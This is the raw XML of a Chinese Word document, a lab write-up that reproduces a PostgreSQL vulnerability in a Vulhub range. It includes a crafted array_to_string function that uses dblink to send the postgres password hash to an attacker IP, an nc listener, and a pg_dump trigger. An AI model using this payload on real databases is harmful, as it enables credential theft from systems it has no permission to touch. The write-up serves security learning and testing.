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2001ED" w:rsidRDefault="005E5046">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002001ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E5046" w:rsidRDefault="005E5046">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、V</w:t>
      </w:r>
      <w:r>
        <w:t>ulhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E5046" w:rsidRDefault="002001ED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ED" w:rsidRDefault="002001ED">
                            <w:r w:rsidRPr="002001ED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2001ED" w:rsidRDefault="002001ED">
                      <w:r w:rsidRPr="002001ED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1ED" w:rsidRDefault="002001ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E5046" w:rsidRPr="002001ED" w:rsidRDefault="005E5046">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002001ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E5046" w:rsidRDefault="005E5046">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="002001ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用攻击机登录p</w:t>
      </w:r>
      <w:r w:rsidR="002001ED">
        <w:t>ostgreSQL</w:t>
      </w:r>
      <w:r w:rsidR="002001ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，账号v</w:t>
      </w:r>
      <w:r w:rsidR="002001ED">
        <w:t>ulhub</w:t>
      </w:r>
      <w:r w:rsidR="002001ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，密码v</w:t>
      </w:r>
      <w:r w:rsidR="002001ED">
        <w:t>ulhub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5134708" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="2794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47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ED" w:rsidRDefault="002001ED">
                            <w:r w:rsidRPr="002001ED">
                              <w:t>psql --host 192.168.111.137 --username vulhub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4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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED">
                      <w:r w:rsidRPr="002001ED">
                        <w:t>psql --host 192.168.111.137 --username vulhub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1ED" w:rsidRDefault="002001ED">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、执行下列语句后退出，h</w:t>
      </w:r>
      <w:r>
        <w:t>ostaddr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填攻击机的i</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5128846" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1524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8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ED" w:rsidRDefault="002001ED" w:rsidP="002001ED">
                            <w:r>
                              <w:t>CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED" w:rsidP="002001ED">
                            <w:r>
                              <w:t xml:space="preserve">    select dblink_connect((select 'hostaddr=192.168.111.143 port=8888 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); </w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED" w:rsidP="002001ED">
                            <w:r>
                              <w:t xml:space="preserve">    SELECT pg_catalog.array_to_string($1,$2);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED" w:rsidP="002001ED">
                            <w:r>
                              <w:t>$$ LANGUAGE SQL VOLATILE;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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED" w:rsidP="002001ED">
                      <w:r>
                        <w:t>CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED" w:rsidP="002001ED">
                      <w:r>
                        <w:t xml:space="preserve">    select dblink_connect((select 'hostaddr=192.168.111.143 port=8888 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); </w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED" w:rsidP="002001ED">
                      <w:r>
                        <w:t xml:space="preserve">    SELECT pg_catalog.array_to_string($1,$2);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED" w:rsidP="002001ED">
                      <w:r>
                        <w:t>$$ LANGUAGE SQL VOLATILE;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1ED" w:rsidRDefault="002001ED">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、此时已经留好了</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后门</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，攻击机上监听</w:t>
      </w:r>
      <w:r>
        <w:t>8888</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002001ED" w:rsidRDefault="002001E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ED" w:rsidRDefault="002001ED">
                            <w:r w:rsidRPr="002001ED">
                              <w:t>nc lvvp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LQ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j9KdtSnhOoOmbUw9DfOI24a&#10;sJ8o6bC3C+o+7pgVlKiXGtVZjKfTMAzRmM6eIpXEnnvKcw/THKEK6ikZtmsfByjyZq5QxY2M/Aa5&#10;h0yOKWPPRtqP8xWG4tyOUb/+Aquf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CbdQLQ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2001ED" w:rsidRDefault="002001ED">
                      <w:r w:rsidRPr="002001ED">
                        <w:t>nc lvvp 8888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1ED" w:rsidRDefault="002001ED">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4、加下来靶机上用超级用户的身份执行p</w:t>
      </w:r>
      <w:r>
        <w:t>g_dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，导出v</w:t>
      </w:r>
      <w:r>
        <w:t>ulhub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个数据库的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002001ED" w:rsidRDefault="002001E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05400" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="1905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1ED" w:rsidRDefault="002001ED">
                            <w:r w:rsidRPr="002001ED">
                              <w:t>docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED">
                      <w:r w:rsidRPr="002001ED">
                        <w:t>docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub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1ED" w:rsidRDefault="002001ED">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5、此时攻击机成功接收p</w:t>
      </w:r>
      <w:r>
        <w:t>ostgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户m</w:t>
      </w:r>
      <w:r>
        <w:t>d5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密后的密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002001ED" w:rsidRDefault="002001ED" w:rsidP="002001E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714DB52" wp14:editId="19A70E53">
            <wp:extent cx="4962525" cy="111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AAD" w:rsidRDefault="00DC1AAD" w:rsidP="005E5046">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DC1AAD" w:rsidRDefault="00DC1AAD" w:rsidP="005E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AAD" w:rsidRDefault="00DC1AAD" w:rsidP="005E5046">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00DC1AAD" w:rsidRDefault="00DC1AAD" w:rsidP="005E5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28"/>
    <w:rsid w:val="002001ED"/>
    <w:rsid w:val="00517128"/>
    <w:rsid w:val="005E5046"/>
    <w:rsid w:val="008B5AE4"/>
    <w:rsid w:val="00D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A9C7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{47148D54-2102-43E3-851D-050E6552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2022-05-29T11:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T12:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>